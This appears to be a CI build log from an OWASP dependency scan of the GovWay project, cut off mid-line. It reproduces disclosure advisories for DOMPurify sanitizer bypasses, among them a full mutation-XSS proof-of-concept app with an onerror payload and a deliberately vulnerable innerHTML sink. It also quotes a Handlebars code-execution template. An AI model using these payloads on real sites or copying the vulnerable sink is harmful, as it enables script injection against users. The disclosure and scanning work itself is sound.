17:38:58 <div class="status-item safe">style (no vulnerable)</div> 17:38:58 </div> 17:38:58 </section> 17:38:58 17:38:58 <section class="card"> 17:38:58 <label>Sanitized response</label> 17:38:58 <pre id="sanitized">(empty)</pre> 17:38:58 </section> 17:38:58 17:38:58 <section class="card"> 17:38:58 <label>Sink</label> 17:38:58 <div id="sink"></div> 17:38:58 </section> 17:38:58 </div> 17:38:58 </main> 17:38:58 17:38:58 <script> 17:38:58 const payload = document.getElementById('payload'); 17:38:58 const wrapper = document.getElementById('wrapper'); 17:38:58 const run = document.getElementById('run'); 17:38:58 const sanitizedNode = document.getElementById('sanitized'); 17:38:58 const sink = document.getElementById('sink'); 17:38:58 17:38:58 run.addEventListener('click', async () => { 17:38:58 const response = await fetch('/sanitize', { 17:38:58 method: 'POST', 17:38:58 headers: { 'Content-Type': 'application/json' }, 17:38:58 body: JSON.stringify({ input: payload.value }) 17:38:58 }); 17:38:58 17:38:58 const data = await response.json(); 17:38:58 const sanitized = data.sanitized || ''; 17:38:58 const w = wrapper.value; 17:38:58 17:38:58 sanitizedNode.textContent = sanitized; 17:38:58 sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>'; 17:38:58 }); 17:38:58 </script> 17:38:58 </body> 17:38:58 </html> 17:38:58 ``` 17:38:58 17:38:58 - server.js 17:38:58 17:38:58 ```js 17:38:58 const express = require('express'); 17:38:58 const path = require('path'); 17:38:58 const { JSDOM } = require('jsdom'); 17:38:58 const createDOMPurify = require('dompurify'); 17:38:58 17:38:58 const app = express(); 17:38:58 const port = process.env.PORT || 3001; 17:38:58 17:38:58 const window = new JSDOM('').window; 17:38:58 const DOMPurify = createDOMPurify(window); 17:38:58 17:38:58 app.use(express.json()); 17:38:58 app.use(express.static(path.join(__dirname, 'public'))); 17:38:58 17:38:58 app.get('/health', (_req, res) => { 17:38:58 res.json({ ok: true, service: 'expoc' }); 17:38:58 }); 17:38:58 17:38:58 app.post('/sanitize', (req, res) => { 17:38:58 const input = typeof req.body?.input === 'string' ? req.body.input : ''; 17:38:58 const sanitized = DOMPurify.sanitize(input); 17:38:58 res.json({ sanitized }); 17:38:58 }); 17:38:58 17:38:58 app.listen(port, () => { 17:38:58 console.log(`expoc running at http://localhost:${port}`); 17:38:58 }); 17:38:58 ``` 17:38:58 17:38:58 - package.json 17:38:58 17:38:58 ```json 17:38:58 { 17:38:58 "name": "expoc", 17:38:58 "version": "1.0.0", 17:38:58 "main": "server.js", 17:38:58 "scripts": { 17:38:58 "test": "echo \"Error: no test specified\" && exit 1", 17:38:58 "start": "node server.js", 17:38:58 "dev": "node server.js" 17:38:58 }, 17:38:58 "keywords": [], 17:38:58 "author": "", 17:38:58 "license": "ISC", 17:38:58 "description": "", 17:38:58 "dependencies": { 17:38:58 "dompurify": "^3.3.1", 17:38:58 "express": "^5.2.1", 17:38:58 "jsdom": "^28.1.0" 17:38:58 } 17:38:58 } 17:38:58 ``` 17:38:58 17:38:58 ## Evidence 17:38:58 17:38:58 - PoC 17:38:58 17:38:58 [daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90) 17:38:58 17:38:58 - XSS triggered 17:38:58 <img width="2746" height="1588" alt="daft-img" src="https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15" /> 17:38:58 17:38:58 ## Why This Happens 17:38:58 This is a mutation-XSS pattern caused by a parse-context mismatch: 17:38:58 17:38:58 - Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules. 17:38:58 - Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior). 17:38:58 - Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure. 17:38:58 17:38:58 Sanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk. 17:38:58 17:38:58 ## Remediation Guidance 17:38:58 1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`. 17:38:58 2. Keep the rendering context stable from sanitize to sink. 17:38:58 3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition. 17:38:58 4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.). 17:38:58 5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers). 17:38:58 17:38:58 Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1. 17:38:58 17:38:58 Following Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft 17:38:58 17:38:58 Acknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote)., ## Summary 17:38:58 DOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href="javascript:alert(document.domain)">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass. 17:38:58 17:38:58 ## Impact 17:38:58 Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS. 17:38:58 17:38:58 ## Credits 17:38:58 Identified by Cantina’s Apex (https://www.cantina.security)., ## Summary 17:38:58 When `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector. 17:38:58 17:38:58 ## Impact 17:38:58 Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered. 17:38:58 17:38:58 ## Credits 17:38:58 Identified by Cantina’s Apex (https://www.cantina.security). 17:38:58 swagger-ui-5.24.1-1.jar: swagger-ui-es-bundle.js (pkg:javascript/DOMPurify@3.2.4) : ## Description 17:38:58 17:38:58 A mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC). 17:38:58 17:38:58 17:38:58 ## Vulnerability 17:38:58 17:38:58 The root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern). 17:38:58 17:38:58 ## PoC 17:38:58 17:38:58 1. Start the PoC app: 17:38:58 ```bash 17:38:58 npm install 17:38:58 npm start 17:38:58 ``` 17:38:58 17:38:58 2. Open `http://localhost:3001`. 17:38:58 3. Set `Wrapper en sink` to `xmp`. 17:38:58 4. Use payload: 17:38:58 ```html 17:38:58 <img src=x alt="</xmp><img src=x onerror=alert('expoc')>"> 17:38:58 ``` 17:38:58 17:38:58 5. Click `Sanitize + Render`. 17:38:58 6. Observe: 17:38:58 - `Sanitized response` still contains the `</xmp>` sequence inside `alt`. 17:38:58 - The sink reparses to include `<img src="x" onerror="alert('expoc')">`. 17:38:58 - `alert('expoc')` is triggered. 17:38:58 7. Files: 17:38:58 - index.html 17:38:58 17:38:58 ```html 17:38:58 <!doctype html> 17:38:58 <html lang="en"> 17:38:58 <head> 17:38:58 <meta charset="utf-8"> 17:38:58 <meta name="viewport" content="width=device-width, initial-scale=1"> 17:38:58 <title>expoc - DOMPurify SSR PoC</title> 17:38:58 <style> 17:38:58 :root { 17:38:58 --bg: #f7f8fb; 17:38:58 --panel: #ffffff; 17:38:58 --line: #d8dce6; 17:38:58 --text: #0f172a; 17:38:58 --muted: #475569; 17:38:58 --accent: #0ea5e9; 17:38:58 } 17:38:58 17:38:58 * { 17:38:58 box-sizing: border-box; 17:38:58 } 17:38:58 17:38:58 body { 17:38:58 margin: 0; 17:38:58 font-family: "SF Mono", Menlo, Consolas, monospace; 17:38:58 color: var(--text); 17:38:58 background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%); 17:38:58 } 17:38:58 17:38:58 main { 17:38:58 max-width: 980px; 17:38:58 margin: 28px auto; 17:38:58 padding: 0 16px 20px; 17:38:58 } 17:38:58 17:38:58 h1 { 17:38:58 margin: 0 0 10px; 17:38:58 font-size: 1.45rem; 17:38:58 } 17:38:58 17:38:58 p { 17:38:58 margin: 0; 17:38:58 color: var(--muted); 17:38:58 } 17:38:58 17:38:58 .grid { 17:38:58 display: grid; 17:38:58 gap: 14px; 17:38:58 margin-top: 16px; 17:38:58 } 17:38:58 17:38:58 .card { 17:38:58 background: var(--panel); 17:38:58 border: 1px solid var(--line); 17:38:58 border-radius: 12px; 17:38:58 padding: 14px; 17:38:58 } 17:38:58 17:38:58 label { 17:38:58 display: block; 17:38:58 margin-bottom: 7px; 17:38:58 font-size: 0.85rem; 17:38:58 color: var(--muted); 17:38:58 } 17:38:58 17:38:58 textarea, 17:38:58 input, 17:38:58 select, 17:38:58 button { 17:38:58 width: 100%; 17:38:58 border: 1px solid var(--line); 17:38:58 border-radius: 8px; 17:38:58 padding: 9px 10px; 17:38:58 font: inherit; 17:38:58 background: #fff; 17:38:58 } 17:38:58 17:38:58 textarea { 17:38:58 min-height: 110px; 17:38:58 resize: vertical; 17:38:58 } 17:38:58 17:38:58 .row { 17:38:58 display: grid; 17:38:58 grid-template-columns: 1fr 230px; 17:38:58 gap: 12px; 17:38:58 } 17:38:58 17:38:58 button { 17:38:58 cursor: pointer; 17:38:58 background: var(--accent); 17:38:58 color: #fff; 17:38:58 border-color: #0284c7; 17:38:58 } 17:38:58 17:38:58 #sink { 17:38:58 min-height: 90px; 17:38:58 border: 1px dashed #94a3b8; 17:38:58 border-radius: 8px; 17:38:58 padding: 10px; 17:38:58 background: #f8fafc; 17:38:58 } 17:38:58 17:38:58 pre { 17:38:58 margin: 0; 17:38:58 white-space: pre-wrap; 17:38:58 word-break: break-word; 17:38:58 } 17:38:58 17:38:58 .note { 17:38:58 margin-top: 8px; 17:38:58 font-size: 0.85rem; 17:38:58 } 17:38:58 17:38:58 .status-grid { 17:38:58 display: grid; 17:38:58 grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); 17:38:58 gap: 8px; 17:38:58 margin-top: 10px; 17:38:58 } 17:38:58 17:38:58 .status-item { 17:38:58 border: 1px solid var(--line); 17:38:58 border-radius: 8px; 17:38:58 padding: 8px 10px; 17:38:58 font-size: 0.85rem; 17:38:58 background: #fff; 17:38:58 } 17:38:58 17:38:58 .status-item.vuln { 17:38:58 border-color: #ef4444; 17:38:58 background: #fef2f2; 17:38:58 } 17:38:58 17:38:58 .status-item.safe { 17:38:58 border-color: #22c55e; 17:38:58 background: #f0fdf4; 17:38:58 } 17:38:58 17:38:58 @media (max-width: 760px) { 17:38:58 .row { 17:38:58 grid-template-columns: 1fr; 17:38:58 } 17:38:58 } 17:38:58 </style> 17:38:58 </head> 17:38:58 <body> 17:38:58 <main> 17:38:58 <h1>expoc - DOMPurify Server-Side PoC</h1> 17:38:58 <p> 17:38:58 Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML. 17:38:58 </p> 17:38:58 17:38:58 <div class="grid"> 17:38:58 <section class="card"> 17:38:58 <label for="payload">Payload</label> 17:38:58 <textarea id="payload"><img src=x alt="</script><img src=x onerror=alert('expoc')>"></textarea> 17:38:58 <div class="row" style="margin-top: 10px;"> 17:38:58 <div> 17:38:58 <label for="wrapper">Wrapper en sink</label> 17:38:58 <select id="wrapper"> 17:38:58 <option value="div">div</option> 17:38:58 <option value="textarea">textarea</option> 17:38:58 <option value="title">title</option> 17:38:58 <option value="style">style</option> 17:38:58 <option value="script" selected>script</option> 17:38:58 <option value="xmp">xmp</option> 17:38:58 <option value="iframe">iframe</option> 17:38:58 <option value="noembed">noembed</option> 17:38:58 <option value="noframes">noframes</option> 17:38:58 <option value="noscript">noscript</option> 17:38:58 </select> 17:38:58 </div> 17:38:58 <div style="display:flex;align-items:end;"> 17:38:58 <button id="run" type="button">Sanitize + Render</button> 17:38:58 </div> 17:38:58 </div> 17:38:58 <p class="note">Se usa render vulnerable: <code>sink.innerHTML = '&lt;wrapper&gt;' + sanitized + '&lt;/wrapper&gt;'</code>.</p> 17:38:58 <div class="status-grid"> 17:38:58 <div class="status-item vuln">script (vulnerable)</div> 17:38:58 <div class="status-item vuln">xmp (vulnerable)</div> 17:38:58 <div class="status-item vuln">iframe (vulnerable)</div> 17:38:58 <div class="status-item vuln">noembed (vulnerable)</div> 17:38:58 <div class="status-item vuln">noframes (vulnerable)</div> 17:38:58 <div class="status-item vuln">noscript (vulnerable)</div> 17:38:58 <div class="status-item safe">div (no vulnerable)</div> 17:38:58 <div class="status-item safe">textarea (no vulnerable)</div> 17:38:58 <div class="status-item safe">title (no vulnerable)</div> 17:38:58 <div class="status-item safe">style (no vulnerable)</div> 17:38:58 </div> 17:38:58 </section> 17:38:58 17:38:58 <section class="card"> 17:38:58 <label>Sanitized response</label> 17:38:58 <pre id="sanitized">(empty)</pre> 17:38:58 </section> 17:38:58 17:38:58 <section class="card"> 17:38:58 <label>Sink</label> 17:38:58 <div id="sink"></div> 17:38:58 </section> 17:38:58 </div> 17:38:58 </main> 17:38:58 17:38:58 <script> 17:38:58 const payload = document.getElementById('payload'); 17:38:58 const wrapper = document.getElementById('wrapper'); 17:38:58 const run = document.getElementById('run'); 17:38:58 const sanitizedNode = document.getElementById('sanitized'); 17:38:58 const sink = document.getElementById('sink'); 17:38:58 17:38:58 run.addEventListener('click', async () => { 17:38:58 const response = await fetch('/sanitize', { 17:38:58 method: 'POST', 17:38:58 headers: { 'Content-Type': 'application/json' }, 17:38:58 body: JSON.stringify({ input: payload.value }) 17:38:58 }); 17:38:58 17:38:58 const data = await response.json(); 17:38:58 const sanitized = data.sanitized || ''; 17:38:58 const w = wrapper.value; 17:38:58 17:38:58 sanitizedNode.textContent = sanitized; 17:38:58 sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>'; 17:38:58 }); 17:38:58 </script> 17:38:58 </body> 17:38:58 </html> 17:38:58 ``` 17:38:58 17:38:58 - server.js 17:38:58 17:38:58 ```js 17:38:58 const express = require('express'); 17:38:58 const path = require('path'); 17:38:58 const { JSDOM } = require('jsdom'); 17:38:58 const createDOMPurify = require('dompurify'); 17:38:58 17:38:58 const app = express(); 17:38:58 const port = process.env.PORT || 3001; 17:38:58 17:38:58 const window = new JSDOM('').window; 17:38:58 const DOMPurify = createDOMPurify(window); 17:38:58 17:38:58 app.use(express.json()); 17:38:58 app.use(express.static(path.join(__dirname, 'public'))); 17:38:58 17:38:58 app.get('/health', (_req, res) => { 17:38:58 res.json({ ok: true, service: 'expoc' }); 17:38:58 }); 17:38:58 17:38:58 app.post('/sanitize', (req, res) => { 17:38:58 const input = typeof req.body?.input === 'string' ? req.body.input : ''; 17:38:58 const sanitized = DOMPurify.sanitize(input); 17:38:58 res.json({ sanitized }); 17:38:58 }); 17:38:58 17:38:58 app.listen(port, () => { 17:38:58 console.log(`expoc running at http://localhost:${port}`); 17:38:58 }); 17:38:58 ``` 17:38:58 17:38:58 - package.json 17:38:58 17:38:58 ```json 17:38:58 { 17:38:58 "name": "expoc", 17:38:58 "version": "1.0.0", 17:38:58 "main": "server.js", 17:38:58 "scripts": { 17:38:58 "test": "echo \"Error: no test specified\" && exit 1", 17:38:58 "start": "node server.js", 17:38:58 "dev": "node server.js" 17:38:58 }, 17:38:58 "keywords": [], 17:38:58 "author": "", 17:38:58 "license": "ISC", 17:38:58 "description": "", 17:38:58 "dependencies": { 17:38:58 "dompurify": "^3.3.1", 17:38:58 "express": "^5.2.1", 17:38:58 "jsdom": "^28.1.0" 17:38:58 } 17:38:58 } 17:38:58 ``` 17:38:58 17:38:58 ## Evidence 17:38:58 17:38:58 - PoC 17:38:58 17:38:58 [daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90) 17:38:58 17:38:58 - XSS triggered 17:38:58 <img width="2746" height="1588" alt="daft-img" src="https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15" /> 17:38:58 17:38:58 ## Why This Happens 17:38:58 This is a mutation-XSS pattern caused by a parse-context mismatch: 17:38:58 17:38:58 - Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules. 17:38:58 - Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior). 17:38:58 - Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure. 17:38:58 17:38:58 Sanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk. 17:38:58 17:38:58 ## Remediation Guidance 17:38:58 1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`. 17:38:58 2. Keep the rendering context stable from sanitize to sink. 17:38:58 3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition. 17:38:58 4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.). 17:38:58 5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers). 17:38:58 17:38:58 Reported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1. 17:38:58 17:38:58 Following Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft 17:38:58 17:38:58 Acknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote)., ## Summary 17:38:58 DOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href="javascript:alert(document.domain)">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass. 17:38:58 17:38:58 ## Impact 17:38:58 Predicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS. 17:38:58 17:38:58 ## Credits 17:38:58 Identified by Cantina’s Apex (https://www.cantina.security)., ## Summary 17:38:58 When `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector. 17:38:58 17:38:58 ## Impact 17:38:58 Prototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered. 17:38:58 17:38:58 ## Credits 17:38:58 Identified by Cantina’s Apex (https://www.cantina.security). 17:38:58 17:38:58 17:38:58 See the dependency-check report for more details. 17:38:58 17:38:58 17:38:58 [INFO] 17:38:58 [INFO] ----------------< org.openspcoop2:org.openspcoop2.ant >----------------- 17:38:58 [INFO] Building dependencies.ant 1.0 [3/67] 17:38:58 [INFO] from mvn/dependencies/ant/pom.xml 17:38:58 [INFO] --------------------------------[ pom ]--------------------------------- 17:38:58 [INFO] 17:38:58 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.ant --- 17:38:58 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/ant (includes = [*.jar], excludes = []) 17:38:58 [INFO] 17:38:58 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.ant --- 17:38:59 [INFO] 17:38:59 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.ant --- 17:38:59 [INFO] Executing tasks 17:39:04 [INFO] Executed tasks 17:39:04 [INFO] 17:39:04 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.ant --- 17:39:04 [INFO] Checking for updates 17:39:04 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:39:05 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:39:05 [INFO] Check for updates complete (111 ms) 17:39:05 [INFO] 17:39:05 17:39:05 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:39:05 17:39:05 17:39:05 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:39:05 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:39:05 17:39:05 17:39:05 [INFO] Analysis Started 17:39:05 [INFO] Finished Archive Analyzer (0 seconds) 17:39:05 [INFO] Finished File Name Analyzer (0 seconds) 17:39:05 [INFO] Finished Jar Analyzer (0 seconds) 17:39:05 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:39:05 [INFO] Finished Hint Analyzer (0 seconds) 17:39:05 [INFO] Finished Version Filter Analyzer (0 seconds) 17:39:10 [INFO] Created CPE Index (5 seconds) 17:39:11 [INFO] Finished CPE Analyzer (5 seconds) 17:39:11 [INFO] Finished False Positive Analyzer (0 seconds) 17:39:11 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:39:11 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:39:11 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:39:11 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:39:11 17:39:11 17:39:11 ## Recommendation 17:39:11 17:39:11 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:39:11 17:39:11 The following template can be used to demonstrate the vulnerability: 17:39:11 ```{{#with "constructor"}} 17:39:11 {{#with split as |a|}} 17:39:11 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:39:11 {{#with (concat (lookup join (slice 0 1)))}} 17:39:11 {{#each (slice 2 3)}} 17:39:11 {{#with (apply 0 a)}} 17:39:11 {{.}} 17:39:11 {{/with}} 17:39:11 {{/each}} 17:39:11 {{/with}} 17:39:11 {{/with}} 17:39:11 {{/with}}``` 17:39:11 17:39:11 17:39:11 ## Recommendation 17:39:11 17:39:11 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, 